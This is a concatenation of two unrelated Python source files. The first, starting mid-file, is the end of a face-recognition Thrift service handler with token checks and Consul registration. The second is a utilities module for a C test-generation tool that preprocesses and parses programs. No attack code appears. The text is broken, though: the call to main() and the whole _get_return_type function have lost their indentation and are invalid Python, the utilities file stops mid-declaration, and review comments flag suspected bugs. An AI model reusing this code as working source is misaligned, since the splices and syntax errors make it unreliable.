                output.details = person.details
                output.autorisations = person.autorisations
            if not person:
                return output
            if loginObject.deviceToken is not None:
                # Known device: echo the token and add a request token if valid.
                output.deviceToken = loginObject.deviceToken
                if ShortTermTokenMemoryClient().validateDeviceToken(loginObject.deviceToken):
                    output.token = self.__get_request_token(uniquename=person.uniquename, deviceToken=loginObject.deviceToken)
            else:
                # New device: register it and return the fresh device token.
                loginObject.deviceInput.person = person.uniquename
                deviceToken = ShortTermTokenMemoryClient().register_device(loginObject.deviceInput)
                output.deviceToken = deviceToken
            return output
        except BadHashException as badHash:
            # ShortTermLogMemoryClient().log_thrift_exception(loginObject, badHash)
            raise badHash
        except LoginFailedException as fail:
            # ShortTermLogMemoryClient().log_thrift_exception(loginObject, fail)
            raise fail

    @staticmethod
    def __get_request_token(uniquename, deviceToken):
        """Build an EyePiInput carrying a LOGIN action and fetch a request token."""
        eyeInput = EyePiInput()
        actions = dict()
        actions[ActionEnum.LOGIN] = pickle.dumps(obj=uniquename, protocol=None, fix_imports=False)
        eyeInput.action = actions
        eyeInput.person = uniquename
        eyeInput.deviceToken = deviceToken
        return ShortTermTokenMemoryClient().getToken(eyeInput)

    @stat.timer("EyePi.handleRequest")
    def handleRequest(self, input):
        """Validate the request token, run face recognition on the supplied
        image, and fan generic actions out to downstream services."""
        try:
            ShortTermLogMemoryClient().log_event(input, message='start eyepi')
            eyeOutput = EyePiOutput()
            tokenValide = True
            if input.token:
                tokenValide = ShortTermTokenMemoryClient().validateToken(input.token, input.deviceToken)
            eyeOutput.ok = tokenValide
            if input.image and tokenValide:
                eyeOutput.ok = False
                eyeOutput.personCollection = []
                facePiOutput = FacePiThriftClient().handle_request(input.image)
                for face in facePiOutput:
                    name = face.person
                    person = LongTermPersonMemoryClient().get_Person(input=name)
                    if person:
                        if person.enabled:
                            # NOTE(review): += with a single face struct looks
                            # like it should be .append(face) -- confirm the
                            # Thrift type before changing.
                            eyeOutput.personCollection += face
                # eyeOutput.personCollection = facePiOutput
                if eyeOutput.personCollection:
                    eyeOutput.ok = True
            if eyeOutput.ok:
                eyeOutput.token = ShortTermTokenMemoryClient().getToken(input)
                eyeOutput.data = self.__make_generic_call(input.action)
            return eyeOutput
        except ThriftServiceException as tex:
            ShortTermLogMemoryClient().log_thrift_exception(input, tex)
            raise tex
        except ExternalEndpointUnavailable as endEx:
            ShortTermLogMemoryClient().log_thrift_endpoint_exception(input, endEx)
            raise endEx
        except Exception as ex:
            ShortTermLogMemoryClient().log_exception(input, ex)
            print('invalid request %s' % ex)
            raise ThriftServiceException('EyePi', 'invalid request %s' % ex)

    @staticmethod
    def __make_generic_call(input):
        """Dispatch each requested action on its own thread and collect the
        non-empty results keyed by action.

        BUG FIX: the broad ``except Exception`` previously came first, which
        made the specific ThriftServiceException / ExternalEndpointUnavailable
        handlers unreachable; the dead ``except Thrift.TException`` clause
        referenced an unimported name and was removed.
        """
        threads = [None] * len(ActionEnum._VALUES_TO_NAMES)
        call_result = [{}] * len(ActionEnum._VALUES_TO_NAMES)
        for key, request in input.items():
            try:
                threads[key] = threading.Thread(target=GenericThriftClient().handle_request, args=(key, request, call_result))
                threads[key].start()
                # return GenericThriftClient().handle_request(key, request.actionParameters)
            except ThriftServiceException as tex:
                raise tex
            except ExternalEndpointUnavailable as endEx:
                raise endEx
            except Exception as ex:
                print('test')
                print('%s' % ex)
            # probably try again
        for key in input:
            threads[key].join()
        output = {}
        for key in range(len(call_result)):
            value = call_result[key]
            if value:
                output[key] = value
            # output = {**output, **i}
        return output

    @stat.timer("EyePi.confimFace")
    def confimFace(self, input):
        # NOTE(review): passes the handler instance as `self` to an unbound
        # client method -- looks suspicious; confirm against FacePiThriftClient.
        FacePiThriftClient.confim_face(self, input)

    @stat.timer("EyePi.writeLog")
    def writeLog(self, input):
        """Forward a log event to the short-term log memory service."""
        ShortTermLogMemoryClient().log_event(input, message='start eyepi')

    @stat.timer("EyePi.ping")
    def ping(self, input):
        """Liveness check: echo the payload to stdout."""
        print(input)
def get_ip():
    """Best-effort discovery of this host's outbound IPv4 address.

    UDP connect() sends no packet; it only makes the OS pick a source
    address, which we read back. Falls back to loopback on failure.
    """
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('255.255.255.255', 1))  # isn't reachable intentionally
        IP = s.getsockname()[0]
    except OSError:
        # FIX: was a bare `except:`; only socket/OS errors are expected here
        # and a bare except also swallowed KeyboardInterrupt/SystemExit.
        IP = '127.0.0.1'
    finally:
        s.close()
    return IP
def create_server():
    """Build a single-threaded Thrift server for the EyePi service on the
    module-level random port, using buffered transport + binary protocol."""
    handler = EyePiThriftHandler()
    return TServer.TSimpleServer(
        EyePiThriftService.Processor(handler),
        TSocket.TServerSocket(port=port),
        TTransport.TBufferedTransportFactory(),
        TBinaryProtocol.TBinaryProtocolFactory()
    )
def register():
    """Register this EyePi instance with consul, attaching a TCP health check.

    BUG FIX: the previous code passed ``deregister=unregister()``, which
    *called* unregister() during registration (immediately deregistering the
    service) and passed its None return value to the check. The ``deregister``
    argument expects a critical-timeout interval, so the kwarg is dropped.
    """
    log.info("register started")
    c = consul.Consul(host=config.consul_ip, port=config.consul_port)
    check = consul.Check.tcp(host=get_ip(), port=port, interval=config.consul_interval,
                             timeout=config.consul_timeout)
    c.agent.service.register(name="eye-pi", service_id="eye-pi-%d" % port, port=port, check=check)
    log.info("services: " + str(c.agent.services()))
def unregister():
    """Remove this instance's consul registrations (both the port-specific
    service id and the bare service name)."""
    log.info("unregister started")
    c = consul.Consul(host=config.consul_ip, port=config.consul_port)
    c.agent.service.deregister("eye-pi-%d" % port)
    c.agent.service.deregister("eye-pi")
    log.info("services: " + str(c.agent.services()))
def interupt_manager():
    # Initializer for the SyncManager worker process: ignore SIGINT so a
    # Ctrl-C only interrupts the main server process, not the manager.
    signal.signal(signal.SIGINT, signal.SIG_IGN)
def main(args=None):
    """Start the EyePi thrift server, registering with consul for the
    server's lifetime and always unregistering on the way out."""
    manager = SyncManager()
    # The manager process uses interupt_manager to ignore SIGINT.
    manager.start(interupt_manager)
    try:
        server = create_server()
        register()
        server.serve()
    finally:
        unregister()
        print('finally EyePi shutting down')
        manager.shutdown()
if __name__ == '__main__':
main()
|
utils.py | import logging
import subprocess
import os
import hashlib
import tempfile
import pycparser
import re
from struct import unpack
import codecs
import shutil
from math import floor
import threading
import time
class MachineModel(object):
    """Describes the C data model (type sizes) of a 32- or 64-bit machine."""

    # Lookup order matters for get_size(): multi-word type names must be
    # tested before their substrings ('long long'/'long double' before 'long').
    _LOOKUP_ORDER = ('short', 'long long', 'long double', 'long',
                     'double', 'float', 'int')

    def __init__(self, wordsize, name, short_size, int_size, long_size,
                 long_long_size, float_size, double_size, long_double_size,
                 compile_param):
        assert wordsize == 32 or wordsize == 64
        self._wordsize = wordsize
        self._name = name
        self.model = {
            'short': short_size,
            'int': int_size,
            'long': long_size,
            'long long': long_long_size,
            'float': float_size,
            'double': double_size,
            'long double': long_double_size,
        }
        self._compile_param = compile_param

    @property
    def short_size(self):
        return self.model['short']

    @property
    def int_size(self):
        return self.model['int']

    @property
    def long_size(self):
        return self.model['long']

    @property
    def long_long_size(self):
        return self.model['long long']

    @property
    def float_size(self):
        return self.model['float']

    @property
    def double_size(self):
        return self.model['double']

    @property
    def long_double_size(self):
        return self.model['long double']

    @property
    def compile_parameter(self):
        return self._compile_param

    @property
    def is_64(self):
        return self._wordsize == 64

    @property
    def is_32(self):
        return self._wordsize == 32

    @property
    def name(self):
        return self._name

    def get_size(self, data_type):
        """Return the size of *data_type*, matched by substring in priority order."""
        for type_name in self._LOOKUP_ORDER:
            if type_name in data_type:
                return self.model[type_name]
        raise AssertionError("Unhandled data type: " + data_type)

    def __str__(self):
        return "{}bit".format(self._wordsize)
class TestCase(object):
    """A single named test case together with its (absolutized) origin file."""

    def __init__(self, name, origin_file, content):
        self._name = name
        # Resolve relative to the cwd at construction time.
        self._origin = os.path.abspath(origin_file)
        self._content = content

    @property
    def name(self):
        return self._name

    @property
    def origin(self):
        """Absolute path of the file this test case came from."""
        return self._origin

    @property
    def content(self):
        return self._content

    def __str__(self):
        return "{}({})".format(self.name, self.origin)
class TestVector(object):
    """Test vector.
    Consists of a unique name, the original file that
    describes the test vector,
    and the vector as a sequence of test inputs.
    Each test input is a dictionary and consists
    of a 'value' and a 'name'.
    """

    def __init__(self, name, origin_file):
        self.name = name
        self.origin = origin_file
        self._inputs = []

    def add(self, value, method=None):
        """Append one test input with the given value and input method."""
        self._inputs.append({'value': value, 'name': method})

    @property
    def vector(self):
        """The sequence of test inputs of this test vector.
        Each element of this sequence is a dict
        and consists of two entries: 'value' and 'name'.
        The 'value' entry describes the input value, as it should be given
        to the program as input.
        The 'name' entry describes the program input method
        through which the value is retrieved. The value of this entry may be None.
        """
        return self._inputs

    def __len__(self):
        return len(self._inputs)

    def __str__(self):
        return "{} ({} )".format(self.origin, self._inputs)
class ConfigError(Exception):
    """Raised for invalid or inconsistent configuration; carries an optional
    message and causing exception."""
    def __init__(self, msg=None, cause=None):
        self.msg = msg
        self.cause = cause
class InputGenerationError(Exception):
    """Raised when test-input generation fails; carries an optional message
    and causing exception."""
    def __init__(self, msg=None, cause=None):
        self.msg = msg
        self.cause = cause
class ParseError(Exception):
    """Raised when parsing input artifacts fails; carries an optional message
    and causing exception."""
    def __init__(self, msg=None, cause=None):
        self.msg = msg
        self.cause = cause
class CompileError(Exception):
    """Raised when compilation fails; carries an optional message and
    causing exception."""
    def __init__(self, msg=None, cause=None):
        self.msg = msg
        self.cause = cause
class ExecutionResult(object):
    """Immutable results of a subprocess execution."""

    def __init__(self, returncode, stdout, stderr):
        self._code = returncode
        self._out = stdout
        self._err = stderr

    @property
    def returncode(self):
        """Exit code of the process."""
        return self._code

    @property
    def stdout(self):
        """Captured standard output."""
        return self._out

    @property
    def stderr(self):
        """Captured standard error (empty when merged into stdout)."""
        return self._err
class Verdict(object):
    """Results of a test validation, test execution or klee-replay currently."""
    def __init__(self, verdict, test=None, test_vector=None, harness=None):
        # verdict is one of the module-level TRUE/FALSE/UNKNOWN constants
        # (defined outside this excerpt).
        self.verdict = verdict
        self.test = test
        self.test_vector = test_vector
        self.harness = harness

    def is_positive(self):
        """
        Returns whether the verdict is positive, i.e., whether a target was found.
        :return: true if the verdict represents that a target was found, false otherwise
        """
        return self.verdict == FALSE

    def __str__(self):
        return self.verdict
class VerdictTrue(Verdict):
    """Verdict: no target was found."""
    def __init__(self):
        super().__init__(TRUE)
class VerdictFalse(Verdict):
    """Verdict: a target was found, with the witnessing test/vector/harness."""
    def __init__(self, test_origin, test_vector=None, harness=None):
        super().__init__(FALSE, test_origin, test_vector, harness)
class VerdictUnknown(Verdict):
    """Verdict: the analysis could not decide."""
    def __init__(self):
        super().__init__(UNKNOWN)
def set_stop_timer(timelimit, stop_event):
    """Arm a background timer that sets *stop_event* after *timelimit* seconds."""
    threading.Timer(timelimit, stop_event.set).start()
def execute(command,
            quiet=False,
            env=None,
            err_to_output=True,
            stop_flag=None,
            input_str=None,
            timelimit=None,
            show_output=False):
    """Run *command* in a subprocess and return an ExecutionResult.

    A watcher thread kills the process when *stop_flag* is set or when
    *timelimit* seconds elapse. *input_str* (str or bytes) is piped to
    stdin; stderr is merged into stdout unless err_to_output is False.
    """
    def wait_and_terminate(timelimit, stop_flag, process):
        # Runs on a separate thread: polls the child every 1 ms and kills
        # it on timeout or external stop request.
        def shut_down(process):
            process.kill()
            returncode = process.wait()
            return returncode
        if timelimit:
            stopwatch = Stopwatch()
            stopwatch.start()
        returncode = process.poll()
        while returncode is None:
            if (stop_flag and stop_flag.is_set()) \
                    or (timelimit and stopwatch.curr_s() > timelimit):
                logging.info("Timeout of %ss expired or told to stop. Killing process.", timelimit if timelimit else "- ")
                returncode = shut_down(process)
            else:
                time.sleep(0.001)
                returncode = process.poll()

    log_cmd = logging.debug if quiet else logging.info
    if env:
        logging.debug("PATH=%s", env['PATH'])
        logging.debug(
            "LD_LIBRARY_PATH=%s",
            env['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in env else "[]")
    log_cmd(" ".join(command))
    p = subprocess.Popen(
        command,
        stdin=subprocess.PIPE if input_str else None,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT if err_to_output else subprocess.PIPE,
        universal_newlines=False,
        env=env)
    waiter = threading.Thread(target=wait_and_terminate, args=(timelimit, stop_flag, p))
    waiter.start()
    if input_str and type(input_str) is not bytes:
        input_str = input_str.encode()
    output, err_output = p.communicate(input=input_str)
    returncode = p.poll()
    # Output may be binary; keep the raw bytes if they cannot be decoded.
    try:
        output = output.decode() if output else ''
    except UnicodeDecodeError:
        pass
    try:
        err_output = err_output.decode() if err_output else ''
    except UnicodeDecodeError:
        pass
    log_output = logging.info if show_output else logging.debug
    if output:
        log_output(output)
    if err_output:
        log_output(err_output)
    return ExecutionResult(returncode, output, err_output)
def get_executable(exec):
    """Resolve *exec* against the search path.

    :return: full path to the executable, or None when it does not exist
    """
    resolved_path = shutil.which(exec)
    return resolved_path
def get_output_path(filename):
    """Map *filename* into the module-wide output directory OUTPUT_DIR."""
    out_dir = OUTPUT_DIR
    return os.path.join(out_dir, filename)
def create_temp():
    """Create and return a fresh temporary directory with prefix 'tbf_'."""
    temp_dir = tempfile.mkdtemp(prefix='tbf_')
    return temp_dir
def get_env():
    """Return a mutable snapshot of the current process environment."""
    return dict(os.environ)
def add_ld_path_to_env(env, lib_dir):
    """Return a copy of *env* whose LD_LIBRARY_PATH starts with *lib_dir*.

    The given mapping is left unmodified. An existing LD_LIBRARY_PATH
    value -- either a single string or a list of path strings -- is kept
    after the new entry.
    """
    ld_entries = [str(lib_dir)]
    if 'LD_LIBRARY_PATH' in env:
        existing = env['LD_LIBRARY_PATH']
        if isinstance(existing, list):
            ld_entries.extend(existing)
        else:
            ld_entries.append(existing)
    patched_env = env.copy()
    patched_env['LD_LIBRARY_PATH'] = ':'.join(ld_entries)
    return patched_env
def get_env_with_path_added(path_addition):
    """Return a copy of os.environ with *path_addition* prepended to PATH."""
    patched_env = os.environ.copy()
    patched_env['PATH'] = os.pathsep.join([path_addition, patched_env['PATH']])
    return patched_env
def get_assume_method():
    """Return the C definition of __VERIFIER_assume used in generated harnesses."""
    source_lines = [
        'void __VERIFIER_assume(int cond) {',
        '  if(!cond) {',
        '    abort();',
        '  }',
        '}',
        '',
    ]
    return '\n'.join(source_lines)
def get_error_method_definition(error_method):
    """Return a C definition of *error_method* that prints ERROR_STRING and exits(1)."""
    body = '() {{ fprintf(stderr, "{0}\\n"); exit(1); }}\n'.format(ERROR_STRING)
    return 'void ' + error_method + body
def get_method_head(method_name, method_type, param_types):
    """Build a C function head ``<type> <name>(<params>)``.

    Entries of *param_types* may be '...' (varargs), 'void' (no
    parameter; only allowed when no other parameter was seen), or a type
    spec. A '{}' placeholder inside the spec marks where the generated
    parameter name goes; without one the name is appended.

    :raises AssertionError: if 'void' follows other parameters
    """
    rendered = []
    for position, type_spec in enumerate(param_types):
        if '...' in type_spec:
            rendered.append('...')
            continue
        if type_spec == 'void':
            if rendered:
                raise AssertionError(
                    "Void type parameter in method " + method_name)
            continue
        template = type_spec if '{}' in type_spec else type_spec + " {}"
        rendered.append(template.format("param{}".format(position)))
    return '{0} {1}({2})'.format(method_type, method_name, ', '.join(rendered))
class Stopwatch(object):
    """Wall-clock stopwatch that records a list of start/stop intervals.

    Each start()/stop() pair records one interval (rounded to
    milliseconds); the aggregate queries work over all recorded intervals.
    """

    def __init__(self):
        # Completed intervals in seconds, rounded to three decimals.
        self._intervals = []
        # Start timestamp of the running interval, or None when stopped.
        self._current_start = None

    def start(self):
        """Start a new interval; the stopwatch must currently be stopped."""
        assert not self._current_start
        # We have to count sleep time because of other processes we wait on!
        self._current_start = time.perf_counter()

    def stop(self):
        """Finish the running interval and record its duration."""
        now = time.perf_counter()
        assert self._current_start
        self._intervals.append(self._process(now - self._current_start))
        self._current_start = None

    def is_running(self):
        """Tell whether an interval is currently being measured."""
        return self._current_start is not None

    def curr_s(self):
        """Return the running interval's elapsed time in whole seconds."""
        assert self._current_start
        elapsed = self._process(time.perf_counter() - self._current_start)
        return int(floor(elapsed))

    def _process(self, value):
        # Millisecond precision is enough for the reported statistics.
        return round(value, 3)

    def sum(self):
        """Total of all recorded intervals (0 when none were recorded)."""
        return self._process(sum(self._intervals))

    def avg(self):
        """Average interval length (0 when none were recorded)."""
        if not self._intervals:
            return self._process(0)
        return self._process(sum(self._intervals) / len(self._intervals))

    def min(self):
        """Shortest recorded interval (0 when none were recorded)."""
        return self._process(min(self._intervals, default=0))

    def max(self):
        """Longest recorded interval (0 when none were recorded)."""
        return self._process(max(self._intervals, default=0))

    def __str__(self):
        text = "{0} (s)".format(self.sum())
        if len(self._intervals) > 1:
            text += " (Avg.: {0} s, Min.: {1} s, Max.: {2} s)".format(
                self.avg(), self.min(), self.max())
        return text
def _rewrite_cproblems(content):
    """Rewrite C constructs that pycparser cannot handle.

    Line by line, this removes block comments, ``__attribute__``
    annotations, inline assembly and several GCC extensions, and patches
    empty struct bodies (a C-standards violation seen in LDV benchmarks).
    Multi-line constructs are tracked with small state flags, so the
    order of the substitutions below matters.
    """
    need_struct_body = False
    skip_asm = False
    in_attribute = False
    in_cxx_comment = False
    prepared_content = ''
    for line in [c + "\n" for c in content.split('\n')]:
        # remove C++-style comments
        if in_cxx_comment:
            if re.search(r'\*/', line):
                line = re.sub(r'.*\*/', '', line)
                in_cxx_comment = False
            else:
                line = ''
        else:
            line = re.sub(r'/\*.*?\*/', '', line)
            if re.search(r'/\*', line):
                line = re.sub(r'/\*.*', '', line)
                in_cxx_comment = True
        # remove __attribute__
        line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\)\)\s*', '', line)
        # line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*[a-zA-Z0-9_, "\.]+\s*\)\s*\)\)\s*', '', line)
        # line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*sizeof\s*\([a-z ]+\)\s*\)\s*\)\)\s*', '', line)
        # line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*\([0-9]+\)\s*<<\s*\([0-9]+\)\s*\)\s*\)\)\s*', '', line)
        line = re.sub(r'__attribute__\s*\(\(.*\)\)\s*', '', line)
        if re.search(r'__attribute__\s*\(\(', line):
            # Attribute opens on this line but closes on a later one.
            line = re.sub(r'__attribute__\s*\(\(.*', '', line)
            in_attribute = True
        elif in_attribute:
            line = re.sub(r'.*\)\)', '', line)
            in_attribute = False
        # rewrite some GCC extensions
        line = re.sub(r'__extension__', '', line)
        line = re.sub(r'__restrict', '', line)
        line = re.sub(r'__restrict__', '', line)
        line = re.sub(r'__inline__', '', line)
        line = re.sub(r'__inline', '', line)
        line = re.sub(r'__const', 'const', line)
        line = re.sub(r'__signed__', 'signed', line)
        line = re.sub(r'__builtin_va_list', 'int', line)
        # a hack for some C-standards violating code in LDV benchmarks
        if need_struct_body and re.match(r'^\s*}\s*;\s*$', line):
            # Struct body turned out empty: give it a dummy member.
            line = 'int __dummy; ' + line
            need_struct_body = False
        elif need_struct_body:
            need_struct_body = re.match(r'^\s*$', line) is not None
        elif re.match(r'^\s*struct\s+[a-zA-Z0-9_]+\s*{\s*$', line):
            need_struct_body = True
        # remove inline asm
        if re.match(r'^\s*__asm__(\s+volatile)?\s*\("([^"]|\\")*"[^;]*$', line):
            skip_asm = True
        elif skip_asm and re.search(r'\)\s*;\s*$', line):
            skip_asm = False
            line = '\n'
        if (skip_asm or re.match(
                r'^\s*__asm__(\s+volatile)?\s*\("([^"]|\\")*"[^;]*\)\s*;\s*$',
                line)):
            line = '\n'
        # remove asm renaming
        line = re.sub(r'__asm__\s*\(""\s+"[a-zA-Z0-9_]+"\)', '', line)
        prepared_content += line
    return prepared_content
def parse_file_with_preprocessing(file_content, machine_model, includes=()):
    """Preprocess C code, patch GCC-isms away, and parse it with pycparser.

    :return: the pycparser AST of the preprocessed program
    """
    preprocessed = preprocess(file_content, machine_model, includes)
    cleaned = _rewrite_cproblems(preprocessed)
    return pycparser.CParser().parse(cleaned)
def preprocess(file_content, machine_model, includes=()):
    """Run the GCC preprocessor over *file_content* for the given machine model.

    Preprocessing is first attempted with -std=gnu11; if that fails, it is
    retried with -std=gnu90.

    :return: the preprocessed source text
    """
    # -E : only preprocess
    # -xc: treat input as C language
    # -  : read the program from stdin
    base_cmd = ['gcc', '-E', '-xc', machine_model.compile_parameter]
    for include_dir in includes:
        base_cmd += ['-I', include_dir]
    result = execute(
        base_cmd + ['-std=gnu11', '-lm', '-'],
        err_to_output=False,
        input_str=file_content,
        quiet=False)
    if result.returncode != 0:
        # Some programs only preprocess cleanly under the older standard.
        result = execute(
            base_cmd + ['-std=gnu90', '-lm', '-'],
            err_to_output=False,
            input_str=file_content,
            quiet=False)
    return result.stdout
def find_nondet_methods(filename, svcomp_only, excludes=None):
    """Collect the undefined/nondeterministic methods of the program in *filename*.

    With *svcomp_only*, only the textual ``__VERIFIER_nondet_*`` convention
    is considered. Otherwise the program is parsed and every declared but
    undefined function is reported, falling back to the SV-COMP convention
    when parsing fails.
    """
    logging.debug("Finding undefined methods")
    with open(filename, 'r') as inp:
        file_content = inp.read()
    if svcomp_only:
        undefined_methods = _find_nondet_methods(file_content, excludes)
    else:
        try:
            undefined_methods = _find_undefined_methods(file_content, excludes)
        except pycparser.plyparser.ParseError as e:
            logging.warning("Parse failure with pycparser while parsing: %s", e)
            undefined_methods = _find_nondet_methods(file_content, excludes)
    logging.debug("Undefined methods: %s", undefined_methods)
    return undefined_methods
def _find_undefined_methods(file_content, excludes):
    """Parse the program and return its declared-but-undefined functions.

    Functions that are defined in the program, implicitly known
    (IMPLICIT_FUNCTIONS) or listed in *excludes* are not reported.

    :return: list of {'name', 'type', 'params'} dicts, one per function
    """
    import tbf.ast_visitor as ast_visitor
    ast = parse_file_with_preprocessing(file_content, MACHINE_MODEL_32)
    func_decl_collector = ast_visitor.FuncDeclCollector()
    func_def_collector = ast_visitor.FuncDefCollector()
    func_decl_collector.visit(ast)
    function_declarations = func_decl_collector.func_decls
    func_def_collector.visit(ast)
    function_definitions = [f.name for f in func_def_collector.func_defs]
    function_definitions += IMPLICIT_FUNCTIONS
    if excludes:
        function_definitions += excludes
    # Keep only declarations that have no matching definition.
    undef_func_prepared = [
        f for f in function_declarations
        if ast_visitor.get_name(f) not in function_definitions
    ]
    undef_func_prepared = [_prettify(f) for f in undef_func_prepared]
    # List every undefined, but declared function only once.
    # This is necessary because there are a few SV-COMP programs that declare
    # functions multiple times.
    undef_func_names = set()
    undefined_functions = list()
    for f in undef_func_prepared:
        if f['name'] and f['name'] not in undef_func_names:
            undef_func_names.add(f['name'])
            undefined_functions.append(f)
    return undefined_functions
def _find_nondet_methods(file_content, excludes):
    """Extract ``__VERIFIER_nondet_*`` calls (and ``__VERIFIER_error``) textually.

    :param file_content: a file name, or the program text itself
    :param excludes: iterable of method names that must not be reported;
        may be None (previously this crashed with ``TypeError: argument of
        type 'NoneType' is not iterable``, since the public entry point
        ``find_nondet_methods`` defaults *excludes* to None)
    :return: list of {'name', 'type', 'params'} method descriptions
    """
    if excludes is None:
        excludes = ()
    if os.path.exists(file_content):
        with open(file_content, 'r') as inp:
            content = inp.read()
    else:
        content = file_content
    # Raw string: '\(' in a plain literal is an invalid escape sequence
    # (SyntaxWarning on modern Python).
    nondet_pattern = re.compile(r'__VERIFIER_nondet_.+?\(\)')
    # s[:-2] strips the trailing '()' from each match.
    method_names = set(
        s[:-2]
        for s in nondet_pattern.findall(content)
        if s[:-2] not in excludes)
    functions = [{
        'name': method_name,
        'type': _get_return_type(method_name),
        'params': []
    } for method_name in method_names]
    svcomp_error_name = '__VERIFIER_error'
    if svcomp_error_name not in excludes:
        functions.append({'name': svcomp_error_name, 'type': 'void', 'params': []})
    return functions
def _get_return_type(verifier_nondet_method):
assert verifier_nondet_method.startswith('__VERIFIER_nondet_')
assert verifier_nondet_method[-2:] != '()'
m_type = verifier_nondet_method[len('__VERIFIER_nondet_'):].lower()
if m_type == 'bool':
m_type = '_Bool'
elif m_type == 'u32':
m_type = 'unsigned int'
elif m_type == 'u16':
m_type = 'unsigned short'
elif m_type == 'u8':
m_type = 'unsigned char'
elif m_type == 'unsigned': # unsigned is a synonym for unsigned int, so recall the method with that
m_type = 'unsigned int'
elif m_type[0] == 'u': # resolve uint to unsigned int (e.g.)
m_type = 'unsigned ' + m_type[1:]
elif m_type == 'pointer':
m_type = 'void *'
elif m_type == 'pchar':
m_type = 'char *'
elif m_type == 's8':
m_type = 'char'
return m_type
def _prettify(func_def):
    """Convert a pycparser function declaration into a plain dict.

    :return: {'name': ..., 'type': return type, 'params': [param types]}
    """
    import tbf.ast_visitor as ast_visitor
    param_types = []
    if func_def.args:
        param_types = [ast_visitor.get_type(p) for p in func_def.args.params]
    return {
        'name': ast_visitor.get_name(func_def),
        'type': ast_visitor.get_type(func_def.type),
        'params': param_types,
    }
def get_sym_var_name(method_name):
    """Return the symbolic-variable name corresponding to *method_name*."""
    sym_name = SYM_VAR_PREFIX + method_name
    logging.debug("Getting sym var name for method %s: %s", method_name, sym_name)
    return sym_name
def get_corresponding_method_name(sym_var_name):
    """Inverse of get_sym_var_name: strip SYM_VAR_PREFIX off again."""
    method_name = sym_var_name[len(SYM_VAR_PREFIX):]
    logging.debug("Getting method name for %s: %s", sym_var_name, method_name)
    return method_name
class Counter(object):
    """Minimal mutable integer counter."""

    def __init__(self):
        self._count = 0

    @property
    def count(self):
        """Current counter value."""
        return self._count

    def inc(self, amount=1):
        """Increase the counter by *amount* (default 1)."""
        self._count = self._count + amount

    def __str__(self):
        return str(self._count)
class Constant(object):
    """Simple holder for a single (possibly unset) value."""

    def __init__(self, value=None):
        # Public on purpose: users read and write .value directly.
        self.value = value

    def __str__(self):
        return str(self.value)
class Statistics(object):
    """Ordered collection of (property, value) statistic entries."""

    def __init__(self, title):
        self._title = title
        self._stats = []

    @property
    def title(self):
        """Headline under which the statistics are reported."""
        return self._title

    def add_value(self, property, value):
        """Record *value* for *property*; each property may appear only once."""
        assert property not in [name for (name, _) in self._stats]
        self._stats.append((property, value))

    @property
    def stats(self):
        """Recorded (property, value) pairs, in insertion order."""
        return self._stats

    def __str__(self):
        header = '---- ' + self._title + ' ----\n'
        entry_lines = [name + ': ' + str(value) for (name, value) in self._stats]
        return header + '\n'.join(entry_lines)
class StatisticsPool(object):
    """Factory and registry for Statistics objects."""

    def __init__(self):
        self._stat_objects = []

    @property
    def stats(self):
        """All Statistics objects created through this pool."""
        return self._stat_objects

    def new(self, title):
        """Create, register and return a new Statistics named *title*."""
        statistics = Statistics(title)
        self._stat_objects.append(statistics)
        return statistics

    def __str__(self):
        return '\n\n'.join(str(s) for s in self._stat_objects)
def found_err(run_result):
    """Tell whether *run_result*'s stderr contains the ERROR_STRING marker."""
    err_out = run_result.stderr
    if isinstance(err_out, bytes):
        err_out = err_out.decode()
    # Keep the truthiness check on the raw stderr value: empty output
    # short-circuits to a falsy result.
    return run_result.stderr and ERROR_STRING in err_out
def get_prepared_name(filename, tool_name):
    """Derive the name of the prepared C file for *filename* and *tool_name*.

    The original extension is replaced by '<tool_name>.c', e.g.
    'dir/test.i' becomes 'test.<tool_name>.c'.
    """
    stem_parts = os.path.basename(filename).split('.')[:-1]
    return '.'.join(stem_parts + [tool_name, 'c'])
def provide_directory(directory):
    """Ensure *directory* exists as a fresh, empty directory.

    Any previous directory at that path is deleted first.

    :return: the directory path, for chaining
    """
    if os.path.exists(directory):
        # Despite the parameter's name, ignore_errors=True is what lets
        # rmtree delete non-empty directories without complaining.
        shutil.rmtree(directory, ignore_errors=True)
    os.mkdir(directory)
    return directory
def get_error_spec(error_method):
    """Return the FQL specification that targets calls to *error_method*."""
    return "COVER(init(main()), FQL(COVER EDGES( @ CALL({}))) )".format(
        error_method)
def get_coverage_spec():
    """Return the FQL specification for basic-block coverage."""
    spec = "COVER( init(main()), FQL(COVER EDGES(@BASICBLOCKENTRY)) )"
    return spec
# Prefix for symbolic variables derived from nondet methods
# (see get_sym_var_name / get_corresponding_method_name).
SYM_VAR_PREFIX = '__sym_'
# Marker printed by generated error methods; found_err() looks for it.
ERROR_STRING = "Error found."
# All generated artifacts are placed below this directory.
OUTPUT_DIR = os.path.abspath('./output')
# Verdict/status string constants.
FALSE = 'FALSE'
UNKNOWN = 'UNKNOWN'
TRUE = 'TRUE'
ERROR = 'ERROR'
DONE = 'DONE'
# Machine models for 32- and 64-bit Linux.
# NOTE(review): the positional numbers are presumably the C type widths
# in bytes expected by MachineModel -- confirm against its definition.
MACHINE_MODEL_32 = MachineModel(32, "32 bit linux", 2, 4, 4, 8, 4, 8, 12,
                                '-m32')
MACHINE_MODEL_64 = MachineModel(64, "64 bit linux", 2, 4, 8, 8, 4, 8, 16,
                                '-m64')
# Make sure the output directory exists as soon as this module is loaded.
if not os.path.exists(OUTPUT_DIR):
    os.mkdir(OUTPUT_DIR)
EXTERNAL_DECLARATIONS = """
struct _IO_FILE;
typedef struct _IO_FILE FILE;
extern struct _IO_FILE *stdin;
extern struct _IO_FILE *stderr;
typedef long unsigned int size_t;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__noreturn__));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__noreturn__));
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream);
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern size_t strlen (const char *__s)
